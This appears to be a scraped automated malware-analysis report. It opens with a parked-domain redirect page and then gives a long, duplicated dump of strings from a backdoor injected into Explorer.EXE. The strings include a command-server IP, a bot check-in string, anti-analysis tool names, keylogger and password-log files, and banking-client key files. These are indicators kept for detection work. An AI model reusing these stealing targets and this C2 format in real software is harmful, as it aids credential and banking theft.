X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUDEKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUDEKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.novomyfexij.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.novomyfexij.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.novomyfexij.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.novomyfexij.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
Map
The Backdoor connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_1572_rwx_01EA0000_000B2000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PASSu98V
PASSu98V
PASSu08V
PASSu08V
FTPQ
FTPQ
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.8.14
4.8.14
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
\firefox.exe
\firefox.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
\wclnt.exe
\wclnt.exe
internal_wutex_0xx
internal_wutex_0xx
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current
Explorer.EXE_1572_rwx_02060000_000B8000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PASSu98V
PASSu98V
PASSu08V
PASSu08V
FTPQ
FTPQ
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.8.14
4.8.14
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
\firefox.exe
\firefox.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
\wclnt.exe
\wclnt.exe
internal_wutex_0xx
internal_wutex_0xx
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
